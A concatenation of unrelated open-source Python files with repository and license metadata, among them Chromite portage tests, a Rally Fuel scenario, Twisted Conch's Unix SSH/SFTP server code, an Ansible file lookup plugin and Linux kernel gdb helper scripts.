def testUnwantedPackage(self):
overlays = {"/overlay": []}
package = _Package(self.package)
portage_utilities._FindUprevCandidates([]).AndReturn(package)
self.mox.ReplayAll()
portage_utilities.BuildEBuildDictionary(overlays, False, [])
self.assertEquals(len(overlays), 1)
self.assertEquals(overlays["/overlay"], [])
self.mox.VerifyAll()
class ProjectMappingTest(cros_test_lib.TestCase):
def testSplitEbuildPath(self):
"""Test if we can split an ebuild path into its components."""
ebuild_path = 'chromeos-base/power_manager/power_manager-9999.ebuild'
components = ['chromeos-base', 'power_manager', 'power_manager-9999']
for path in (ebuild_path, './' + ebuild_path, 'foo.bar/' + ebuild_path):
self.assertEquals(components, portage_utilities.SplitEbuildPath(path))
def testSplitPV(self):
"""Test splitting PVs into package and version components."""
pv = 'bar-1.2.3_rc1-r5'
package, version_no_rev, rev = tuple(pv.split('-'))
split_pv = portage_utilities.SplitPV(pv)
self.assertEquals(split_pv.pv, pv)
self.assertEquals(split_pv.package, package)
self.assertEquals(split_pv.version_no_rev, version_no_rev)
self.assertEquals(split_pv.rev, rev)
self.assertEquals(split_pv.version, '%s-%s' % (version_no_rev, rev))
def testSplitCPV(self):
"""Test splitting CPV into components."""
cpv = 'foo/bar-4.5.6_alpha-r6'
cat, pv = cpv.split('/', 1)
split_pv = portage_utilities.SplitPV(pv)
split_cpv = portage_utilities.SplitCPV(cpv)
self.assertEquals(split_cpv.category, cat)
for k, v in split_pv._asdict().iteritems():
self.assertEquals(getattr(split_cpv, k), v)
def testFindWorkonProjects(self):
"""Test if we can find the list of workon projects."""
power_manager = 'chromeos-base/power_manager'
power_manager_project = 'chromiumos/platform/power_manager'
kernel = 'sys-kernel/chromeos-kernel'
kernel_project = 'chromiumos/third_party/kernel'
matches = [
([power_manager], set([power_manager_project])),
([kernel], set([kernel_project])),
([power_manager, kernel], set([power_manager_project, kernel_project]))
]
if portage_utilities.FindOverlays(constants.BOTH_OVERLAYS):
for packages, projects in matches:
self.assertEquals(projects,
portage_utilities.FindWorkonProjects(packages))
class PackageDBTest(cros_test_lib.MoxTempDirTestCase):
fake_pkgdb = { 'category1' : [ 'package-1', 'package-2' ],
'category2' : [ 'package-3', 'package-4' ],
'category3' : [ 'invalid', 'semi-invalid' ],
'invalid' : [], }
fake_packages = []
build_root = None
fake_chroot = None
def setUp(self):
self.build_root = self.tempdir
# Prepare a fake chroot.
self.fake_chroot = os.path.join(self.build_root, 'chroot/build/amd64-host')
fake_pkgdb_path = os.path.join(self.fake_chroot, 'var/db/pkg')
os.makedirs(fake_pkgdb_path)
for cat, pkgs in self.fake_pkgdb.iteritems():
catpath = os.path.join(fake_pkgdb_path, cat)
if cat == 'invalid':
# Invalid category is a file. Should not be delved into.
osutils.Touch(catpath)
continue
os.makedirs(catpath)
for pkg in pkgs:
pkgpath = os.path.join(catpath, pkg)
if pkg == 'invalid':
          # Invalid package is a file instead of a directory.
osutils.Touch(pkgpath)
continue
os.makedirs(pkgpath)
if pkg.endswith('-invalid'):
          # Invalid package lacks the expected "%s/%s.ebuild" file.
osutils.Touch(os.path.join(pkgpath, 'whatever'))
continue
# Correct pkg.
osutils.Touch(os.path.join(pkgpath, pkg + '.ebuild'))
pv = portage_utilities.SplitPV(pkg)
key = '%s/%s' % (cat, pv.package)
self.fake_packages.append((key, pv.version))
def testListInstalledPackages(self):
"""Test if listing packages installed into a root works."""
packages = portage_utilities.ListInstalledPackages(self.fake_chroot)
# Sort the lists, because the filesystem might reorder the entries for us.
packages.sort()
self.fake_packages.sort()
self.assertEquals(self.fake_packages, packages)
if __name__ == '__main__':
cros_test_lib.main()
|
bsd-3-clause
|
varuntiwari27/rally
|
rally/plugins/openstack/scenarios/fuel/environments.py
|
5
|
3334
|
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from rally.plugins.openstack import scenario
from rally.plugins.openstack.scenarios.fuel import utils
from rally.task import validation
class FuelEnvironments(utils.FuelScenario):
"""Benchmark scenarios for Fuel environments.
Scenarios take Fuel related parameters:
release_id: OpenStack release available in Fuel
deployment_mode: accepts 'ha_compact' or 'multinode'
network_provider: accepts 'nova' or 'neutron'
net_segment_type: accepts 'gre' or 'vlan'
"""
@validation.required_clients("fuel", admin=True)
@validation.required_openstack(admin=True)
@scenario.configure(context={"admin_cleanup": ["fuel"]})
def create_and_delete_environment(self, release_id=1,
network_provider="neutron",
deployment_mode="ha_compact",
net_segment_type="vlan",
delete_retries=5):
"""Create and delete Fuel environments.
:param release_id: release id (default 1)
:param network_provider: network provider (default 'neutron')
:param deployment_mode: deployment mode (default 'ha_compact')
:param net_segment_type: net segment type (default 'vlan')
:param delete_retries: retries count on delete operations (default 5)
"""
env_id = self._create_environment(release_id=release_id,
network_provider=network_provider,
deployment_mode=deployment_mode,
net_segment_type=net_segment_type)
self._delete_environment(env_id, delete_retries)
@validation.required_clients("fuel", admin=True)
@validation.required_openstack(admin=True)
@scenario.configure(context={"admin_cleanup": ["fuel"]})
def create_and_list_environments(self, release_id=1,
network_provider="neutron",
deployment_mode="ha_compact",
net_segment_type="vlan"):
"""Create and list Fuel environments
:param release_id: release id (default 1)
:param network_provider: network provider (default 'neutron')
:param deployment_mode: deployment mode (default 'ha_compact')
:param net_segment_type: net segment type (default 'vlan')
"""
self._create_environment(release_id=release_id,
network_provider=network_provider,
deployment_mode=deployment_mode,
net_segment_type=net_segment_type)
self._list_environments()
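# Illustrative sketch (assumed): how this scenario might be referenced from a
# Rally task file; the argument values and runner settings below are
# placeholders, not defaults mandated by this plugin.
#
#     FuelEnvironments.create_and_delete_environment:
#       - args:
#           release_id: 2
#           network_provider: "neutron"
#           deployment_mode: "ha_compact"
#           net_segment_type: "vlan"
#           delete_retries: 5
#         runner:
#           type: "constant"
#           times: 5
#           concurrency: 1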
|
apache-2.0
|
hanicker/odoo
|
addons/base_report_designer/plugin/openerp_report_designer/bin/script/Expression.py
|
384
|
4146
|
#########################################################################
#
# Copyright (c) 2003-2004 Danny Brewer [email protected]
# Copyright (C) 2004-2010 OpenERP SA (<http://openerp.com>).
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# See: http://www.gnu.org/licenses/lgpl.html
#
#############################################################################
import uno
import string
import unohelper
import xmlrpclib
from com.sun.star.task import XJobExecutor
if __name__<>"package":
from lib.gui import *
from lib.error import ErrorDialog
from lib.functions import *
database="test"
uid = 3
class Expression(unohelper.Base, XJobExecutor ):
def __init__(self, sExpression="", sName="", bFromModify=False):
LoginTest()
if not loginstatus and __name__=="package":
exit(1)
self.win = DBModalDialog(60, 50, 180, 65, "Expression Builder")
self.win.addFixedText("lblExpression",17 , 10, 35, 15, "Expression :")
self.win.addEdit("txtExpression", -5, 5, 123, 15)
self.win.addFixedText("lblName", 2, 30, 50, 15, "Displayed Name :")
self.win.addEdit("txtName", -5, 25, 123, 15)
self.win.addButton( "btnOK", -5, -5, 40, 15, "OK", actionListenerProc = self.btnOk_clicked )
self.win.addButton( "btnCancel", -5 - 40 -5, -5, 40, 15, "Cancel", actionListenerProc = self.btnCancel_clicked )
self.bModify=bFromModify
if self.bModify==True:
self.win.setEditText("txtExpression",sExpression)
self.win.setEditText("txtName",sName)
self.win.doModalDialog("",None)
def btnOk_clicked(self, oActionEvent):
desktop=getDesktop()
doc = desktop.getCurrentComponent()
text = doc.Text
cursor = doc.getCurrentController().getViewCursor()
if self.bModify==True:
oCurObj=cursor.TextField
sKey=u""+self.win.getEditText("txtName")
sValue=u"[[ " + self.win.getEditText("txtExpression") + " ]]"
oCurObj.Items = (sKey,sValue)
oCurObj.update()
self.win.endExecute()
else:
oInputList = doc.createInstance("com.sun.star.text.TextField.DropDown")
if self.win.getEditText("txtName")!="" and self.win.getEditText("txtExpression")!="":
sKey=u""+self.win.getEditText("txtName")
sValue=u"[[ " + self.win.getEditText("txtExpression") + " ]]"
if cursor.TextTable==None:
oInputList.Items = (sKey,sValue)
text.insertTextContent(cursor,oInputList,False)
else:
oTable = cursor.TextTable
oCurCell = cursor.Cell
tableText = oTable.getCellByName( oCurCell.CellName )
oInputList.Items = (sKey,sValue)
tableText.insertTextContent(cursor,oInputList,False)
self.win.endExecute()
else:
ErrorDialog("Please fill appropriate data in Name field or in Expression field.")
def btnCancel_clicked(self, oActionEvent):
self.win.endExecute()
if __name__<>"package" and __name__=="__main__":
Expression()
elif __name__=="package":
g_ImplementationHelper.addImplementation( Expression, "org.openoffice.openerp.report.expression", ("com.sun.star.task.Job",),)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
tlodge/dataware.nox
|
src/nox/coreapps/examples/countdown.py
|
10
|
1618
|
# Copyright 2008 (C) Nicira, Inc.
#
# This file is part of NOX.
#
# NOX is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# NOX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NOX. If not, see <http://www.gnu.org/licenses/>.
# Trivial example using reactor timer method to countdown from three
from nox.lib.core import *
import logging
logger = logging.getLogger('nox.coreapps.examples.countdown')
numbers = ["one","two","three"]
index = 0
class countdown(Component):
def __init__(self, ctxt):
Component.__init__(self, ctxt)
def install(self):
# call every second
self.post_callback(1, lambda : self.count_down())
def getInterface(self):
return str(countdown)
def count_down(self):
global index
        # No, this isn't misspelled. If you're curious, see Farscape
        # episode 1.17.
logger.debug("%s %s" % (numbers[index], 'mippippi'))
index+=1
if index < len(numbers):
self.post_callback(1, lambda : self.count_down())
def getFactory():
class Factory:
def instance(self, ctxt):
return countdown(ctxt)
return Factory()
|
gpl-3.0
|
okuchaiev/f-lm
|
data_utils_test.py
|
2
|
1148
|
import unittest
from data_utils import Vocabulary, Dataset
class DataUtilsTestCase(unittest.TestCase):
def test_vocabulary(self):
vocab = Vocabulary.from_file("testdata/test_vocab.txt")
self.assertEqual(vocab.num_tokens, 1000)
self.assertEqual(vocab.s_id, 2)
self.assertEqual(vocab.s, "<S>")
self.assertEqual(vocab.unk_id, 38)
self.assertEqual(vocab.unk, "<UNK>")
def test_dataset(self):
vocab = Vocabulary.from_file("testdata/test_vocab.txt")
dataset = Dataset(vocab, "testdata/*")
def generator():
for i in range(1, 10):
yield [0] + list(range(1, i + 1)) + [0]
counts = [0] * 10
for seq in generator():
for v in seq:
counts[v] += 1
counts2 = [0] * 10
for x, y in dataset._iterate(generator(), 2, 4):
for v in x.ravel():
counts2[v] += 1
for i in range(1, 10):
self.assertEqual(counts[i], counts2[i], "Mismatch at i=%d. counts[i]=%s, counts2[i]=%s" % (i,counts[i], counts2[i]))
if __name__ == '__main__':
unittest.main()
|
mit
|
ehashman/oh-mainline
|
vendor/packages/twisted/twisted/conch/unix.py
|
20
|
15784
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
from twisted.cred import portal
from twisted.python import components, log
from twisted.internet.error import ProcessExitedAlready
from zope import interface
from ssh import session, forwarding, filetransfer
from ssh.filetransfer import FXF_READ, FXF_WRITE, FXF_APPEND, FXF_CREAT, FXF_TRUNC, FXF_EXCL
from twisted.conch.ls import lsLine
from avatar import ConchUser
from error import ConchError
from interfaces import ISession, ISFTPServer, ISFTPFile
import struct, os, time, socket
import fcntl, tty
import pwd, grp
import pty
import ttymodes
try:
import utmp
except ImportError:
utmp = None
class UnixSSHRealm:
interface.implements(portal.IRealm)
def requestAvatar(self, username, mind, *interfaces):
user = UnixConchUser(username)
return interfaces[0], user, user.logout
class UnixConchUser(ConchUser):
def __init__(self, username):
ConchUser.__init__(self)
self.username = username
self.pwdData = pwd.getpwnam(self.username)
l = [self.pwdData[3]]
for groupname, password, gid, userlist in grp.getgrall():
if username in userlist:
l.append(gid)
self.otherGroups = l
self.listeners = {} # dict mapping (interface, port) -> listener
self.channelLookup.update(
{"session": session.SSHSession,
"direct-tcpip": forwarding.openConnectForwardingClient})
self.subsystemLookup.update(
{"sftp": filetransfer.FileTransferServer})
def getUserGroupId(self):
return self.pwdData[2:4]
def getOtherGroups(self):
return self.otherGroups
def getHomeDir(self):
return self.pwdData[5]
def getShell(self):
return self.pwdData[6]
def global_tcpip_forward(self, data):
hostToBind, portToBind = forwarding.unpackGlobal_tcpip_forward(data)
from twisted.internet import reactor
try: listener = self._runAsUser(
reactor.listenTCP, portToBind,
forwarding.SSHListenForwardingFactory(self.conn,
(hostToBind, portToBind),
forwarding.SSHListenServerForwardingChannel),
interface = hostToBind)
except:
return 0
else:
self.listeners[(hostToBind, portToBind)] = listener
if portToBind == 0:
portToBind = listener.getHost()[2] # the port
return 1, struct.pack('>L', portToBind)
else:
return 1
def global_cancel_tcpip_forward(self, data):
hostToBind, portToBind = forwarding.unpackGlobal_tcpip_forward(data)
listener = self.listeners.get((hostToBind, portToBind), None)
if not listener:
return 0
del self.listeners[(hostToBind, portToBind)]
self._runAsUser(listener.stopListening)
return 1
def logout(self):
# remove all listeners
for listener in self.listeners.itervalues():
self._runAsUser(listener.stopListening)
log.msg('avatar %s logging out (%i)' % (self.username, len(self.listeners)))
def _runAsUser(self, f, *args, **kw):
euid = os.geteuid()
egid = os.getegid()
groups = os.getgroups()
uid, gid = self.getUserGroupId()
os.setegid(0)
os.seteuid(0)
os.setgroups(self.getOtherGroups())
os.setegid(gid)
os.seteuid(uid)
try:
f = iter(f)
except TypeError:
f = [(f, args, kw)]
try:
for i in f:
func = i[0]
args = len(i)>1 and i[1] or ()
kw = len(i)>2 and i[2] or {}
r = func(*args, **kw)
finally:
os.setegid(0)
os.seteuid(0)
os.setgroups(groups)
os.setegid(egid)
os.seteuid(euid)
return r
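    # Usage note (illustrative; both call forms appear in the SFTP methods
    # further down): _runAsUser takes either a single callable with args/kwargs,
    # or an iterable of (func, args[, kwargs]) tuples run in sequence while the
    # process temporarily assumes the avatar's uid/gid, e.g.
    #   self.avatar._runAsUser(os.remove, filename)
    #   self.avatar._runAsUser([(os.mkdir, (path,)), (self._setAttrs, (path, attrs))])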
class SSHSessionForUnixConchUser:
interface.implements(ISession)
def __init__(self, avatar):
self.avatar = avatar
        self.environ = {'PATH':'/bin:/usr/bin:/usr/local/bin'}
self.pty = None
self.ptyTuple = 0
def addUTMPEntry(self, loggedIn=1):
if not utmp:
return
ipAddress = self.avatar.conn.transport.transport.getPeer().host
        packedIp, = struct.unpack('L', socket.inet_aton(ipAddress))
ttyName = self.ptyTuple[2][5:]
t = time.time()
t1 = int(t)
t2 = int((t-t1) * 1e6)
entry = utmp.UtmpEntry()
entry.ut_type = loggedIn and utmp.USER_PROCESS or utmp.DEAD_PROCESS
entry.ut_pid = self.pty.pid
entry.ut_line = ttyName
entry.ut_id = ttyName[-4:]
entry.ut_tv = (t1,t2)
if loggedIn:
entry.ut_user = self.avatar.username
entry.ut_host = socket.gethostbyaddr(ipAddress)[0]
entry.ut_addr_v6 = (packedIp, 0, 0, 0)
a = utmp.UtmpRecord(utmp.UTMP_FILE)
a.pututline(entry)
a.endutent()
b = utmp.UtmpRecord(utmp.WTMP_FILE)
b.pututline(entry)
b.endutent()
def getPty(self, term, windowSize, modes):
self.environ['TERM'] = term
self.winSize = windowSize
self.modes = modes
master, slave = pty.openpty()
ttyname = os.ttyname(slave)
self.environ['SSH_TTY'] = ttyname
self.ptyTuple = (master, slave, ttyname)
def openShell(self, proto):
from twisted.internet import reactor
if not self.ptyTuple: # we didn't get a pty-req
log.msg('tried to get shell without pty, failing')
raise ConchError("no pty")
uid, gid = self.avatar.getUserGroupId()
homeDir = self.avatar.getHomeDir()
shell = self.avatar.getShell()
self.environ['USER'] = self.avatar.username
self.environ['HOME'] = homeDir
self.environ['SHELL'] = shell
shellExec = os.path.basename(shell)
peer = self.avatar.conn.transport.transport.getPeer()
host = self.avatar.conn.transport.transport.getHost()
self.environ['SSH_CLIENT'] = '%s %s %s' % (peer.host, peer.port, host.port)
self.getPtyOwnership()
self.pty = reactor.spawnProcess(proto, \
shell, ['-%s' % shellExec], self.environ, homeDir, uid, gid,
usePTY = self.ptyTuple)
self.addUTMPEntry()
fcntl.ioctl(self.pty.fileno(), tty.TIOCSWINSZ,
struct.pack('4H', *self.winSize))
if self.modes:
self.setModes()
self.oldWrite = proto.transport.write
proto.transport.write = self._writeHack
self.avatar.conn.transport.transport.setTcpNoDelay(1)
def execCommand(self, proto, cmd):
from twisted.internet import reactor
uid, gid = self.avatar.getUserGroupId()
homeDir = self.avatar.getHomeDir()
shell = self.avatar.getShell() or '/bin/sh'
command = (shell, '-c', cmd)
peer = self.avatar.conn.transport.transport.getPeer()
host = self.avatar.conn.transport.transport.getHost()
self.environ['SSH_CLIENT'] = '%s %s %s' % (peer.host, peer.port, host.port)
if self.ptyTuple:
self.getPtyOwnership()
self.pty = reactor.spawnProcess(proto, \
shell, command, self.environ, homeDir,
uid, gid, usePTY = self.ptyTuple or 0)
if self.ptyTuple:
self.addUTMPEntry()
if self.modes:
self.setModes()
# else:
# tty.setraw(self.pty.pipes[0].fileno(), tty.TCSANOW)
self.avatar.conn.transport.transport.setTcpNoDelay(1)
def getPtyOwnership(self):
ttyGid = os.stat(self.ptyTuple[2])[5]
uid, gid = self.avatar.getUserGroupId()
euid, egid = os.geteuid(), os.getegid()
os.setegid(0)
os.seteuid(0)
try:
os.chown(self.ptyTuple[2], uid, ttyGid)
finally:
os.setegid(egid)
os.seteuid(euid)
def setModes(self):
pty = self.pty
attr = tty.tcgetattr(pty.fileno())
for mode, modeValue in self.modes:
if not ttymodes.TTYMODES.has_key(mode): continue
ttyMode = ttymodes.TTYMODES[mode]
if len(ttyMode) == 2: # flag
flag, ttyAttr = ttyMode
if not hasattr(tty, ttyAttr): continue
ttyval = getattr(tty, ttyAttr)
if modeValue:
attr[flag] = attr[flag]|ttyval
else:
attr[flag] = attr[flag]&~ttyval
elif ttyMode == 'OSPEED':
attr[tty.OSPEED] = getattr(tty, 'B%s'%modeValue)
elif ttyMode == 'ISPEED':
attr[tty.ISPEED] = getattr(tty, 'B%s'%modeValue)
else:
if not hasattr(tty, ttyMode): continue
ttyval = getattr(tty, ttyMode)
attr[tty.CC][ttyval] = chr(modeValue)
tty.tcsetattr(pty.fileno(), tty.TCSANOW, attr)
def eofReceived(self):
if self.pty:
self.pty.closeStdin()
def closed(self):
if self.ptyTuple and os.path.exists(self.ptyTuple[2]):
ttyGID = os.stat(self.ptyTuple[2])[5]
os.chown(self.ptyTuple[2], 0, ttyGID)
if self.pty:
try:
self.pty.signalProcess('HUP')
except (OSError,ProcessExitedAlready):
pass
self.pty.loseConnection()
self.addUTMPEntry(0)
log.msg('shell closed')
def windowChanged(self, winSize):
self.winSize = winSize
fcntl.ioctl(self.pty.fileno(), tty.TIOCSWINSZ,
struct.pack('4H', *self.winSize))
def _writeHack(self, data):
"""
Hack to send ignore messages when we aren't echoing.
"""
if self.pty is not None:
attr = tty.tcgetattr(self.pty.fileno())[3]
if not attr & tty.ECHO and attr & tty.ICANON: # no echo
self.avatar.conn.transport.sendIgnore('\x00'*(8+len(data)))
self.oldWrite(data)
class SFTPServerForUnixConchUser:
interface.implements(ISFTPServer)
def __init__(self, avatar):
self.avatar = avatar
def _setAttrs(self, path, attrs):
"""
NOTE: this function assumes it runs as the logged-in user:
i.e. under _runAsUser()
"""
if attrs.has_key("uid") and attrs.has_key("gid"):
os.chown(path, attrs["uid"], attrs["gid"])
if attrs.has_key("permissions"):
os.chmod(path, attrs["permissions"])
if attrs.has_key("atime") and attrs.has_key("mtime"):
os.utime(path, (attrs["atime"], attrs["mtime"]))
def _getAttrs(self, s):
return {
"size" : s.st_size,
"uid" : s.st_uid,
"gid" : s.st_gid,
"permissions" : s.st_mode,
"atime" : int(s.st_atime),
"mtime" : int(s.st_mtime)
}
def _absPath(self, path):
home = self.avatar.getHomeDir()
return os.path.abspath(os.path.join(home, path))
def gotVersion(self, otherVersion, extData):
return {}
def openFile(self, filename, flags, attrs):
return UnixSFTPFile(self, self._absPath(filename), flags, attrs)
def removeFile(self, filename):
filename = self._absPath(filename)
return self.avatar._runAsUser(os.remove, filename)
def renameFile(self, oldpath, newpath):
oldpath = self._absPath(oldpath)
newpath = self._absPath(newpath)
return self.avatar._runAsUser(os.rename, oldpath, newpath)
def makeDirectory(self, path, attrs):
path = self._absPath(path)
return self.avatar._runAsUser([(os.mkdir, (path,)),
(self._setAttrs, (path, attrs))])
def removeDirectory(self, path):
path = self._absPath(path)
self.avatar._runAsUser(os.rmdir, path)
def openDirectory(self, path):
return UnixSFTPDirectory(self, self._absPath(path))
def getAttrs(self, path, followLinks):
path = self._absPath(path)
if followLinks:
s = self.avatar._runAsUser(os.stat, path)
else:
s = self.avatar._runAsUser(os.lstat, path)
return self._getAttrs(s)
def setAttrs(self, path, attrs):
path = self._absPath(path)
self.avatar._runAsUser(self._setAttrs, path, attrs)
def readLink(self, path):
path = self._absPath(path)
return self.avatar._runAsUser(os.readlink, path)
def makeLink(self, linkPath, targetPath):
linkPath = self._absPath(linkPath)
targetPath = self._absPath(targetPath)
return self.avatar._runAsUser(os.symlink, targetPath, linkPath)
def realPath(self, path):
return os.path.realpath(self._absPath(path))
def extendedRequest(self, extName, extData):
raise NotImplementedError
class UnixSFTPFile:
interface.implements(ISFTPFile)
def __init__(self, server, filename, flags, attrs):
self.server = server
openFlags = 0
if flags & FXF_READ == FXF_READ and flags & FXF_WRITE == 0:
openFlags = os.O_RDONLY
if flags & FXF_WRITE == FXF_WRITE and flags & FXF_READ == 0:
openFlags = os.O_WRONLY
if flags & FXF_WRITE == FXF_WRITE and flags & FXF_READ == FXF_READ:
openFlags = os.O_RDWR
if flags & FXF_APPEND == FXF_APPEND:
openFlags |= os.O_APPEND
if flags & FXF_CREAT == FXF_CREAT:
openFlags |= os.O_CREAT
if flags & FXF_TRUNC == FXF_TRUNC:
openFlags |= os.O_TRUNC
if flags & FXF_EXCL == FXF_EXCL:
openFlags |= os.O_EXCL
if attrs.has_key("permissions"):
mode = attrs["permissions"]
del attrs["permissions"]
else:
mode = 0777
fd = server.avatar._runAsUser(os.open, filename, openFlags, mode)
if attrs:
server.avatar._runAsUser(server._setAttrs, filename, attrs)
self.fd = fd
def close(self):
return self.server.avatar._runAsUser(os.close, self.fd)
def readChunk(self, offset, length):
return self.server.avatar._runAsUser([ (os.lseek, (self.fd, offset, 0)),
(os.read, (self.fd, length)) ])
def writeChunk(self, offset, data):
return self.server.avatar._runAsUser([(os.lseek, (self.fd, offset, 0)),
(os.write, (self.fd, data))])
def getAttrs(self):
s = self.server.avatar._runAsUser(os.fstat, self.fd)
return self.server._getAttrs(s)
def setAttrs(self, attrs):
raise NotImplementedError
class UnixSFTPDirectory:
def __init__(self, server, directory):
self.server = server
self.files = server.avatar._runAsUser(os.listdir, directory)
self.dir = directory
def __iter__(self):
return self
def next(self):
try:
f = self.files.pop(0)
except IndexError:
raise StopIteration
else:
s = self.server.avatar._runAsUser(os.lstat, os.path.join(self.dir, f))
longname = lsLine(f, s)
attrs = self.server._getAttrs(s)
return (f, longname, attrs)
def close(self):
self.files = []
components.registerAdapter(SFTPServerForUnixConchUser, UnixConchUser, filetransfer.ISFTPServer)
components.registerAdapter(SSHSessionForUnixConchUser, UnixConchUser, session.ISession)
|
agpl-3.0
|
amwelch/a10sdk-python
|
a10sdk/core/delete/delete_health_external.py
|
2
|
1033
|
from a10sdk.common.A10BaseClass import A10BaseClass
class HealthExternal(A10BaseClass):
""" :param file_name: {"description": "Specify the Program Name", "format": "string", "minLength": 1, "optional": true, "maxLength": 31, "type": "string"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
Class Description::
Address the External Script Program.
Class health-external supports CRUD Operations and inherits from `common/A10BaseClass`.
    This class is the `"PARENT"` class for this module.
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/delete/health-external`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "health-external"
self.a10_url="/axapi/v3/delete/health-external"
self.DeviceProxy = ""
self.file_name = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
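# Minimal usage sketch (illustrative only; the DeviceProxy session object is
# assumed to come from a10sdk's device-proxy layer, see common/device_proxy.py,
# and is not constructed here):
#   ext = HealthExternal(file_name="my_check", DeviceProxy=device_proxy)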
|
apache-2.0
|
redbaron/ansible
|
lib/ansible/runner/lookup_plugins/file.py
|
153
|
2413
|
# (c) 2012, Daniel Hokka Zakrisson <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from ansible import utils, errors
import os
import codecs
class LookupModule(object):
def __init__(self, basedir=None, **kwargs):
self.basedir = basedir
def run(self, terms, inject=None, **kwargs):
terms = utils.listify_lookup_plugin_terms(terms, self.basedir, inject)
ret = []
# this can happen if the variable contains a string, strictly not desired for lookup
# plugins, but users may try it, so make it work.
if not isinstance(terms, list):
terms = [ terms ]
for term in terms:
basedir_path = utils.path_dwim(self.basedir, term)
relative_path = None
playbook_path = None
# Special handling of the file lookup, used primarily when the
# lookup is done from a role. If the file isn't found in the
# basedir of the current file, use dwim_relative to look in the
# role/files/ directory, and finally the playbook directory
# itself (which will be relative to the current working dir)
if '_original_file' in inject:
relative_path = utils.path_dwim_relative(inject['_original_file'], 'files', term, self.basedir, check=False)
if 'playbook_dir' in inject:
playbook_path = os.path.join(inject['playbook_dir'], term)
for path in (basedir_path, relative_path, playbook_path):
if path and os.path.exists(path):
ret.append(codecs.open(path, encoding="utf8").read().rstrip())
break
else:
raise errors.AnsibleError("could not locate file in lookup: %s" % term)
return ret
|
gpl-3.0
|
ccrome/linux-caleb-dev
|
scripts/gdb/linux/tasks.py
|
630
|
2892
|
#
# gdb helper commands and functions for Linux kernel debugging
#
# task & thread tools
#
# Copyright (c) Siemens AG, 2011-2013
#
# Authors:
# Jan Kiszka <[email protected]>
#
# This work is licensed under the terms of the GNU GPL version 2.
#
import gdb
from linux import utils
task_type = utils.CachedType("struct task_struct")
def task_lists():
task_ptr_type = task_type.get_type().pointer()
init_task = gdb.parse_and_eval("init_task").address
t = g = init_task
while True:
while True:
yield t
t = utils.container_of(t['thread_group']['next'],
task_ptr_type, "thread_group")
if t == g:
break
t = g = utils.container_of(g['tasks']['next'],
task_ptr_type, "tasks")
if t == init_task:
return
def get_task_by_pid(pid):
for task in task_lists():
if int(task['pid']) == pid:
return task
return None
class LxTaskByPidFunc(gdb.Function):
"""Find Linux task by PID and return the task_struct variable.
$lx_task_by_pid(PID): Given PID, iterate over all tasks of the target and
return that task_struct variable which PID matches."""
def __init__(self):
super(LxTaskByPidFunc, self).__init__("lx_task_by_pid")
def invoke(self, pid):
task = get_task_by_pid(pid)
if task:
return task.dereference()
else:
raise gdb.GdbError("No task of PID " + str(pid))
LxTaskByPidFunc()
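# Example gdb usage (illustrative, per the docstring above):
#   (gdb) p $lx_task_by_pid(1)
# prints the task_struct of PID 1, or raises a gdb error if no such task exists.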
class LxPs(gdb.Command):
"""Dump Linux tasks."""
def __init__(self):
super(LxPs, self).__init__("lx-ps", gdb.COMMAND_DATA)
def invoke(self, arg, from_tty):
for task in task_lists():
gdb.write("{address} {pid} {comm}\n".format(
address=task,
pid=task["pid"],
comm=task["comm"].string()))
LxPs()
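# Example gdb usage (illustrative): typing "lx-ps" at the gdb prompt dumps one
# line per task: task_struct address, pid and comm.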
thread_info_type = utils.CachedType("struct thread_info")
ia64_task_size = None
def get_thread_info(task):
thread_info_ptr_type = thread_info_type.get_type().pointer()
if utils.is_target_arch("ia64"):
global ia64_task_size
if ia64_task_size is None:
ia64_task_size = gdb.parse_and_eval("sizeof(struct task_struct)")
thread_info_addr = task.address + ia64_task_size
thread_info = thread_info_addr.cast(thread_info_ptr_type)
else:
thread_info = task['stack'].cast(thread_info_ptr_type)
return thread_info.dereference()
class LxThreadInfoFunc (gdb.Function):
"""Calculate Linux thread_info from task variable.
$lx_thread_info(TASK): Given TASK, return the corresponding thread_info
variable."""
def __init__(self):
super(LxThreadInfoFunc, self).__init__("lx_thread_info")
def invoke(self, task):
return get_thread_info(task)
LxThreadInfoFunc()
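# Example gdb usage (illustrative): the helpers compose, e.g.
#   (gdb) p $lx_thread_info($lx_task_by_pid(1))
# returns the thread_info of PID 1's task.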
|
gpl-2.0
|
ChronoMonochrome/android_kernel_ste-3.4
|
tools/perf/scripts/python/sched-migration.py
|
11215
|
11670
|
#!/usr/bin/python
#
